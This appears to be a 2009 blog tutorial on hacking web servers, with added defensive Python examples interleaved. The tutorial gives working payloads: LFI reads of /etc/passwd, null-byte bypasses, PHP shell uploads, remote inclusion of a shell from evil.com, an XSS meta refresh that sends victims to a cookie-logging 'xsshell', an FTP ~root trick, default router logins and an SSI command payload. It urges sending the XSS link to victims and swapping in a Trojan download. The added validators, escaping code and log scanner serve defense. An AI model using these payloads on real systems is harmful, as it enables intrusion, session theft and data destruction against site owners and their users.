Server Flaws

Friday, November 13, 2009

Today I will be showing you many, many flaws on an internal server. We will go through PHP attacks, Java attacks, and URL manipulation.

Let's start with URL manipulation, shall we?

URL Manipulation

Well, let's say you find a login for a certain website.
Go ahead and view the source.
If you see anything similar to:

index.php?file=login.php

then that is the PHP file representing login.php. Here is an example of how the URL may look:

http://www.target.com/admin/index.php?file=login.php

Once we go there it will probably forbid access, because we did not enter anything and we do not have any SESSION id given by the server.

But don't you see anything suspicious on the page that is functioning (index.php?file=login.php)? Well, if you see anything cached on that page such as password.php, you're in luck. Go to that exact PHP file. You can do this via: http://www.target.com/admin/index.php?file=password.php
And you might get back the Administrator username and password, with no encryption in any format whatsoever (MD5, SHA1, etc.).

But the administrators can go further to protect themselves, and there are more manipulations. Let's continue on to them.

Null Byte Includes

Now, in our last URL manipulation we got access to the admin site, and while reviewing the source we found:

index.php?file=login.php

which pointed us to password.php: if we replaced login.php with password.php, it would show the administrative USR and PWD without any encryption (MD5, SHA1, etc.).

But what if the administrators have knowledge and are smarter? What they think is that LFI is LFI, and if its original form doesn't work, it will never work. That is totally wrong. You can use null byte includes to gain knowledge of the PHP/CGI source that is representing that file.

So basically, let's say that password.php was forbidden for outside users. Here is a sample of that content:

index.php?file=password.php

It featured content showing the password without any encryption.
But once you go to it, you're forbidden. This can be changed by adding a null byte include. Here is how it would look:

index.php?file=password.php%00

That poisoned null byte gives us the ability to view the source of that .PHP file, thus giving us the password for the administrative user account.

This can be used for other destruction, such as viewing config.php, /etc/passwd, etc.

Null Byte Upload

Let's say you make an attempt to upload a shell on some website, but it replies back with an error claiming it only accepts JPG, PNG, etc.

Well, most of you would say "Ugh, I'll just give up."
And others would say "I will just rename my shell to ShellName.php.jpg."

Both are wrong.

You can simply bypass this using a poison null byte upload.
How do you do this destructive attack? It's really simple; follow these steps:

1. Open Notepad
2. Copy and paste your PHP shell
3. File >> Save as >> shellname.php%00.jpg
4. Upload to the server

Our null byte (%00), the URL-encoded form of a NUL character, cuts the filename off before .jpg, thus giving back our file (in most cases your shell).
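From the defender's side, this is what the upload handler should have done. The following Python function is an added example, not code from the post: it checks the raw filename for an embedded NUL, judges only the last extension against an allowlist, verifies the file's leading bytes against that type, and stores the file under a server-chosen name so the client never controls the path or extension. The allowlist, the magic-byte table and the test inputs are constructed for the example.

```python
import os
import secrets

# Constructed allowlist for this example: permitted extension -> magic bytes
# the file content must begin with. Everything else is rejected.
ALLOWED_TYPES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def validate_upload(raw_name, data):
    """Decide whether an uploaded file may be stored.

    raw_name: the filename as bytes, exactly as it arrived (already
              URL-decoded by the framework, so a %00 is a real NUL here).
    data:     the file content.
    Returns (accepted, reason, stored_name). stored_name is a fresh
    server-chosen name, so the client never picks the path or extension.
    """
    # 1. A NUL anywhere in the name is never legitimate. Filesystem calls
    #    written in C stop at it, turning shell.php<NUL>.jpg into shell.php.
    if b"\x00" in raw_name:
        return False, "null byte in filename", None
    try:
        name = raw_name.decode("utf-8")
    except UnicodeDecodeError:
        return False, "filename is not valid UTF-8", None
    # 2. Drop any directory component the client supplied.
    name = os.path.basename(name.replace("\\", "/"))
    # 3. Use the LAST extension only: 'shell.php.jpg' yields '.jpg' and is
    #    then judged on its content, not on the middle part of the name.
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, "extension %r not allowed" % ext, None
    # 4. The content must look like the type it claims to be.
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "content does not match %s" % ext, None
    # 5. Reject images that also carry PHP open tags; a misconfigured
    #    server could still hand such a file to the interpreter.
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded PHP tag", None
    stored = secrets.token_hex(16) + ext
    return True, "ok", stored


if __name__ == "__main__":
    # Constructed sample uploads covering the cases from the post.
    samples = [
        (b"shellname.php\x00.jpg", b"<?php echo 'x'; ?>"),
        (b"shellname.php.jpg", b"<?php echo 'x'; ?>"),
        (b"shell.php", b"<?php echo 'x'; ?>"),
        (b"../../photo.JPG", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
    ]
    for raw_name, data in samples:
        print(raw_name, "->", validate_upload(raw_name, data)[:2])
```

The decision is made on the decoded bytes, not on the string a web framework hands back, because the NUL is exactly what a string-based check tends to lose.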

LFI Tutorial

LFI stands for Local File Inclusion; it is basically URL traversal. Here is an example of an LFI code:

victim.com/index.php?page=../../../../../../../etc/passwd

And here is an example of vulnerable code:

<?php
$page = $_GET['page'];   // user input taken straight from the query string
include($page);          // and included without any check at all
?>

That PHP script should never be used, because $page is passed directly from the URL into include().

And the LFI code shows what can happen if your $page is written like that.

The ../'s you see are called URL traversal; they let you move anywhere around the server using characters that represent up, down, etc.

Let's move on to the LFI script itself and play around with it for a bit.

victim.com/index.php?page=../../../../../../../etc/passwd

What that does is go up the directory tree to /etc/passwd.
/etc/passwd is the file on a Linux box holding its encrypted passwords; just as Windows has its own encrypted password store (SAM), Unix has one as well.

Once they gain access to that file, they have the ability to view users and crack the encoded password via brute force.

But sometimes administrators can be smart, and this is where the poisoned null byte comes in handy: if you cannot access /etc/passwd, it probably means that the administrator appended something to the path.
So you can try:

victim.com/index.php?page=../../../../../../../etc/passwd%00

You can use a poison null byte because sometimes admins append something like .php or .txt to the parameter to make it harder for you to reach the file.
Fortunately, you can easily bypass this using the poison null byte.

RFI Tutorial

RFI is most commonly used to transmit a shell to a web server, but it is actually not uploaded; it just appears on the web server itself.

RFI can be used for plenty of things, transmitting password loggers, etc. But it is commonly used for its brilliant ability to store a shell.

Now, if you're not familiar with what a shell is, a shell is a PHP script that is used to cd to directories, view dirs, gain access to MySQL, and find private files the server has stored on its web server.

How can this be a bad thing for you? They can leak an entire db using their access to MySQL; this db can feature usernames, passwords, emails, etc.

They can gain access to ANYTHING. Here is an example of an RFI attempt:

http://www.victim.com/index.php?page=htt...shell.txt?

That tells the web server to go to the page http://www.evil.com/shell.txt.
And how will it work, you may be asking yourself? Well, it will work because the .txt file is filled with PHP commands/tags that point at the PHP extension.

We need to add the ? because it works a bit like URL traversal, but it really isn't; it just points at that location (http://www.evil.com/shell.txt).
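The hardened counterpart to the $_GET['page'] include shown in the LFI section, written in Python as an added example rather than the post's own code so that it runs as a stand-alone script. It maps the page parameter through an allowlist and rejects, with a reason suitable for logging, each of the three tricks described in the LFI, null byte and RFI sections: the %00 that truncates password.php%00, the ../ walk to /etc/passwd, and an http://.../shell.txt? value. ALLOWED_PAGES and the placeholder files written into a temporary pages directory are constructed for the example.

```python
import os
import tempfile
from urllib.parse import urlsplit

# Constructed allowlist: the only values of ?page= that index.php honours,
# mapped to the file each one means. The client never names a file directly.
ALLOWED_PAGES = {"login": "login.php", "news": "news.php"}


def resolve_include(page, pages_dir, allowed=ALLOWED_PAGES):
    """Return (path, "ok") for an acceptable page value, or (None, reason).

    The allowlist alone would stop every trick in the post; the checks in
    front of it exist so the rejection reason is visible in logs, and the
    realpath check behind it guards against an allowlist entry that is
    later edited carelessly.
    """
    if "\x00" in page:
        return None, "null byte in page parameter"
    parts = urlsplit(page)
    if parts.scheme or parts.netloc:          # http://..., ftp://..., //host/...
        return None, "remote URL in page parameter"
    if "/" in page or "\\" in page or ".." in page:
        return None, "path characters in page parameter"
    if page not in allowed:
        return None, "page not in allowlist"
    base = os.path.realpath(pages_dir)
    target = os.path.realpath(os.path.join(base, allowed[page]))
    # realpath has followed symlinks and collapsed ../ by now, so this
    # comparison is made on the file that would actually be included.
    if os.path.commonpath([base, target]) != base:
        return None, "allowlisted file resolves outside pages directory"
    if not os.path.isfile(target):
        return None, "allowlisted file missing"
    return target, "ok"


def make_demo_pages_dir():
    """Create a throwaway pages directory holding constructed placeholder files."""
    d = tempfile.mkdtemp(prefix="pages_")
    for fname in ("login.php", "news.php", "password.php"):
        with open(os.path.join(d, fname), "w") as fh:
            fh.write("<?php /* constructed placeholder: %s */ ?>\n" % fname)
    return d


DEMO_DIR = make_demo_pages_dir()

if __name__ == "__main__":
    for value in ("login", "password.php", "password.php\x00",
                  "../../../../../../../etc/passwd",
                  "http://www.evil.com/shell.txt?"):
        path, why = resolve_include(value, DEMO_DIR)
        print("%-40r -> %s" % (value, path if path else "REJECTED: " + why))
```

Note that password.php is present in the pages directory and is still unreachable: being a file on disk does not put it in the allowlist, which is the property the post's index.php lacks.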

XSS

XSS is used a lot on search engines; it can also be used to point at an xsshell.

But first, let's play around with JavaScript. Find yourself a search box and try typing this in:

<script>alert("Test")</script>

That makes an alert box featuring our keyword "Test".
So press enter, and if it comes back with what we presented in our script, then your site is vulnerable to XSS.

You may be saying, is this only possible in JavaScript? No, there are HTML injections, which look similar to this:

sup

If you get the (sup) back, it is also vulnerable to HTML injection.

But we are focusing on JavaScript. Let's say we wanted to point a victim at the xsshell we created, which logs cookies. We can do this using this simple script:

<meta content="0;url=http://www.yourxsshell.com/attack.php" http-equiv="refresh">

That uses a meta refresh to redirect to your xsshell.

Here is an example of how that may look after it is encoded (this uses google.com as an example):

http://www.lapdonline.org/search_results...rch_terms=

There you go, it is encoded.

What you want to do is redirect it to your XSSHell, so you might need to modify my example.

Download xsshell (includes info, etc.):

http://www.darknet.org.uk/2006/12/xss-sh...door-tool/

Now, once you send that XSS'd link to somebody, which includes your xsshell, you will log all of their cookies, session ids, etc.

You can even put a Trojan download instead of an XSShell, but you have to make it look well thought out.
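What a defender does with the reflected search term, and with a suspicious link like the encoded one above, as an added Python example that is not part of the post: render_search_results escapes the term before placing it in the page, so the alert payload and the meta refresh are displayed as text instead of being executed, while extract_search_terms and suspicious_markup decode a captured link once and name the markup it carries. The page template, the marker list and the sample link (which uses www.example.com in place of a real site) are constructed for the example.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed list of markup fragments worth flagging in a decoded parameter.
SUSPICIOUS_MARKERS = ("<script", "javascript:", "<meta", "http-equiv",
                      "onerror=", "onload=")


def render_search_results(term, hits):
    """Build the results page for a search, reflecting the term safely.

    html.escape turns < > & " ' into entities, so whatever the user typed
    is shown as text and never parsed as a tag or an attribute.
    """
    safe_term = html.escape(term, quote=True)
    items = "".join("<li>%s</li>" % html.escape(hit, quote=True) for hit in hits)
    return ("<!DOCTYPE html><html><body>"
            "<p>Results for <b>%s</b></p><ul>%s</ul>"
            "</body></html>" % (safe_term, items))


def extract_search_terms(url, param="search_terms"):
    """Decode a captured link exactly once and return the named parameter.

    parse_qs undoes the %XX and + encoding, which is what the victim's
    browser would do before the value reached the search page.
    """
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    values = query.get(param, [])
    return values[0] if values else ""


def suspicious_markup(value):
    """Return the markers present in a decoded value, in list order."""
    low = value.lower()
    return [marker for marker in SUSPICIOUS_MARKERS if marker in low]


if __name__ == "__main__":
    payload = '<script>alert("Test")</script>'
    print(render_search_results(payload, ["first hit", "a<b"]))
    # Constructed link: the post's meta refresh, URL-encoded as a search term.
    link = ("http://www.example.com/search?search_terms="
            "%3Cmeta+content%3D%220%3Burl%3Dhttp%3A%2F%2Fwww.yourxsshell.com"
            "%2Fattack.php%22+http-equiv%3D%22refresh%22%3E")
    decoded = extract_search_terms(link)
    print(decoded)
    print(suspicious_markup(decoded))
```

Escaping is done at the moment the value is written into HTML, not when it is read from the query string; a value that is stored and later displayed elsewhere needs the same treatment at each output point.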

FTP Hacking

FTP is the File Transfer Protocol on a web server; it is used to store files, view files, etc.

But there is a root account that holds all the permissions; we don't have root, and it would probably take forever to brute-force the account.

So a trick is to do the following:

1. Open Command Prompt
2. Type in: ftp http://www.target.com
3. Enter WRONG details.
4. Once you're done with that, type in: quote user ftp
then type in: quote cwd ~root
then type in: quote pass ftp

That quotes the user account ftp,
then it quotes the cwd of ~root.

Don't expect this to work on every website; some websites have anonymous login disabled, meaning this won't work as often as you expected it to.


Part 2

Robots.txt destruction:

Robots.txt is a text file that is used to control spiders that visit your website. This file grants or denies access to certain folders, file types, and specific files depending on the robot accessing the site.

Here is an example of Robots.txt:

User-agent: *
Allow: /searchhistory/
Disallow: /news?output=xhtml&
Allow: /news?output=xhtml
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Disallow: /nwshp
Disallow: /?
Disallow: /addurl/image?
Disallow: /pagead/
Disallow: /relpage/
Disallow: /relcontent
Disallow: /sorry/
Disallow: /imgres
Disallow: /keyword/
Disallow: /u/

Also, the same file might include a line such as:

Disallow: /admin/

This can be used as a URL traversal method.

Here is an example of how it may look:

http://www.host.com/disallowed directory/RandomLeters&symbols

Well, after you get a 404 ERROR page, you should see something like /../
You may remember from our LFI explanation that /../ is used to move to other directories; in this case, it gives us access to the disallowed directories that are listed in Robots.txt. For example:

http://www.host.com/disallowed directory/Abunchofrandomletters&symbols/../admin/

But do NOT expect this to work on every single website that has Robots.txt.
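To see what a robots.txt actually tells a visitor, and what the /../ trick above does to a request path, here is an added Python example (not code from the post). parse_robots reads the file into per-agent Allow and Disallow lists and reports directives it does not recognise, since a misspelled Disallow silently protects nothing; normalize_request_path collapses ../ the way a web server does before it routes a request, which is the path an access check on a disallowed directory has to be made on. The robots.txt text is the post's example with one constructed, deliberately misspelled /admin/ line appended.

```python
import posixpath

# The post's example robots.txt, with one constructed line appended at the
# end whose directive name is misspelled on purpose.
ROBOTS_TXT = """\
User-agent: *
Allow: /searchhistory/
Disallow: /news?output=xhtml&
Allow: /news?output=xhtml
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Disallow: /nwshp
Disallow: /?
Disallow: /addurl/image?
Disallow: /pagead/
Disallow: /relpage/
Disallow: /relcontent
Disallow: /sorry/
Disallow: /imgres
Disallow: /keyword/
Disallow: /u/
Disalow: /admin/
"""

KNOWN_FIELDS = ("user-agent", "allow", "disallow", "sitemap", "crawl-delay")


def parse_robots(text):
    """Return (rules, problems).

    rules maps each User-agent value to {"allow": [...], "disallow": [...]};
    consecutive User-agent lines share the group of rules that follows them.
    problems lists, with line numbers, the lines a crawler would ignore.
    """
    rules, problems, agents, previous_was_agent = {}, [], [], False
    for number, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        field, sep, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if not sep:
            problems.append("line %d: no ':' separator" % number)
            continue
        if field == "user-agent":
            if not previous_was_agent:
                agents = []
            agents.append(value)
            rules.setdefault(value, {"allow": [], "disallow": []})
            previous_was_agent = True
            continue
        previous_was_agent = False
        if field in ("allow", "disallow"):
            if not agents:
                problems.append("line %d: %s before any User-agent" % (number, field))
                continue
            for agent in agents:
                rules[agent][field].append(value)
        elif field not in KNOWN_FIELDS:
            original = line.split(":", 1)[0].strip()
            problems.append("line %d: unknown directive %r" % (number, original))
    return rules, problems


def normalize_request_path(path):
    """Collapse '.' and '..' segments as a web server does before routing."""
    norm = posixpath.normpath("/" + path.lstrip("/"))
    if path.endswith("/") and not norm.endswith("/"):
        norm += "/"
    return norm


if __name__ == "__main__":
    rules, problems = parse_robots(ROBOTS_TXT)
    print("paths disclosed to every visitor:", rules["*"]["disallow"])
    print("problems:", problems)
    for p in ("/disallowed_directory/Abunchofrandomletters/../admin/",
              "/disallowed_directory/x/../../admin/", "/../../admin/"):
        print(p, "->", normalize_request_path(p))
```

Two things follow from running it: every Disallow line is a directory name handed to anyone who reads the file, so a directory that needs protecting needs authentication on the normalized path rather than a robots.txt entry; and the post's /../ example lands on /disallowed_directory/admin/, not on /admin/, because one ../ only undoes the random segment before it.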

PPPoE Exposure

PPPoE is a method of transmitting PPP traffic over Ethernet to the Internet through a common broadband medium.

But sometimes even hosts do not have PPP tunneled (if they have it on their network).

PPP can be used in telnet, so that is what we will be focusing on.

First, you want to do an nmap scan via:

nmap -v -A host.com

You will need to wait until it is finished; we need to see what OS this runs under, and this will give us loads of information, such as possible router info.

So after it's done you might want to go to Google and search:

Router-Name Default Password

because in telnet, the PPPoE password is usually left at the default.

So, for example, if it prompts you for the user and password, you can try:

Admin
Password

Now, once you're in, you can cd to directories and view dirs; the /var section includes the ability to view messages, logs, etc.
You may want to focus on finding config.xml, because that includes CWMP, ACS, and possibly POP information.

If, however, you cannot get PPPoE access, you can run a brute-force attack, or you can try accessing certain hosts such as cwmp.host.com. Usually these sites are put under HTTPS because they think it is a high level of encryption and so harder to crack, but the password for that can be easily obtained using user-agent vulnerabilities, cookie spoofing, and also the FTP vulnerabilities which were discussed in our previous tutorial on Web Hacking.

The FTP vulnerabilities we discussed will get you to a very high level, because it may include db's, configs, etc.

Serverside Includes (Evil SSI)

The most common way to find one of these vulnerabilities is to simply use a search box. Server-side includes basically give you the ability to view directories. Just so I can explain it in a more efficient way, let's say you're in the directory /admin and you have a search field, and you're wondering what else is in the /admin directory. Well, you can simply use this:

<!--#exec cmd="ls" -->

ls is a command used to display directories, and cmd is basically a Command Prompt.

After we get a reply displayed along with directories, we can use rm in the same way to remove directories.

We can do a lot of things, but these are just set examples.
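Pulling the whole post together from the detection side: the following Python script is an added example (not from the post) that scans constructed web-server access log lines for the request patterns each section described: ../ traversal, a %00 null byte, a remote URL in a parameter, a reflected script or meta tag, and an SSI exec directive. The log lines, IP addresses and hostnames are constructed; the patterns are taken from the post's own examples.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format: client, ident, user, [timestamp], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

# Constructed sample of what the requests in this post look like in a log.
LOG_LINES = [
    '10.0.0.5 - - [13/Nov/2009:10:01:02 +0000] "GET /index.php?page=news HTTP/1.1" 200 5120',
    '10.0.0.7 - - [13/Nov/2009:10:01:09 +0000] "GET /index.php?page=../../../../../../../etc/passwd HTTP/1.1" 200 1842',
    '10.0.0.7 - - [13/Nov/2009:10:01:15 +0000] "GET /admin/index.php?file=password.php%00 HTTP/1.1" 200 410',
    '10.0.0.9 - - [13/Nov/2009:10:02:30 +0000] "GET /index.php?page=http://www.evil.com/shell.txt? HTTP/1.1" 200 9031',
    '10.0.0.11 - - [13/Nov/2009:10:03:01 +0000] "GET /search?q=%3Cscript%3Ealert%28%22Test%22%29%3C%2Fscript%3E HTTP/1.1" 200 2210',
    '10.0.0.12 - - [13/Nov/2009:10:03:40 +0000] "GET /admin/search?q=%3C%21--%23exec+cmd%3D%22ls%22+--%3E HTTP/1.1" 200 700',
    '10.0.0.5 - - [13/Nov/2009:10:04:00 +0000] "GET /images/logo.png HTTP/1.1" 304 -',
]


def classify_request(target):
    """Return the set of indicator names for one request target (path + query).

    The target is decoded once, the way the application would see it, and
    each check corresponds to one technique from the post.
    """
    decoded = unquote(target)
    tags = set()
    if "\x00" in decoded or "%00" in decoded:      # literal or double-encoded NUL
        tags.add("null-byte")
    if "../" in decoded or "..\\" in decoded:
        tags.add("traversal")
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if re.match(r"(?i)^(https?|ftp)://", value):   # parameter holds a URL
            tags.add("remote-include")
    low = decoded.lower()
    if "<script" in low or "http-equiv" in low or "javascript:" in low:
        tags.add("xss")
    if "<!--#exec" in low:
        tags.add("ssi-exec")
    return tags


def scan_log(lines):
    """Return one record per log line that carries at least one indicator."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = LOG_RE.match(line)
        if not match:
            continue                                # not a log line we understand
        tags = classify_request(match.group("target"))
        if tags:
            hits.append({"line": number, "ip": match.group("ip"),
                         "status": match.group("status"),
                         "target": match.group("target"), "tags": sorted(tags)})
    return hits


if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print("line %(line)d %(ip)s %(status)s %(tags)s %(target)s" % hit)
```

The status code is kept in each record on purpose: a traversal or null-byte request answered with 200 and a non-trivial size deserves a look at what was returned, whereas the same request answered with 403 or 404 is a probe that the server turned away.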
